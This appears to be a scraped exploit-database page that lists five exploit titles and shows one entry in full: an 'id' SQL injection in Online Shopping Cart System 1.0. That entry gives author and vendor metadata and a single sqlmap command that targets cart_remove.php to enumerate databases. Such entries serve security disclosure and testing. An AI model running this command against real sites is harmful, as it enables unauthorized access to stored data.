
5 changes to exploits/shellcodes Online Movie Streaming 1.0 - Admin Authentication Bypass Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated) Online Shopping Cart System 1.0 - 'id' SQL Injection Laravel 8.4.2 debug mode - Remote code execution Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)
11 lines
No EOL
514 B
Text
11 lines
No EOL
514 B
Text
# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection
|
||
# Date: 14.1.2021
|
||
# Exploit Author: Aydın Baran Ertemir
|
||
# Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html
|
||
# Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code
|
||
# Version: 1.0
|
||
# Tested on: Kali Linux
|
||
|
||
Use SQLMAP:
|
||
|
||
sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3 |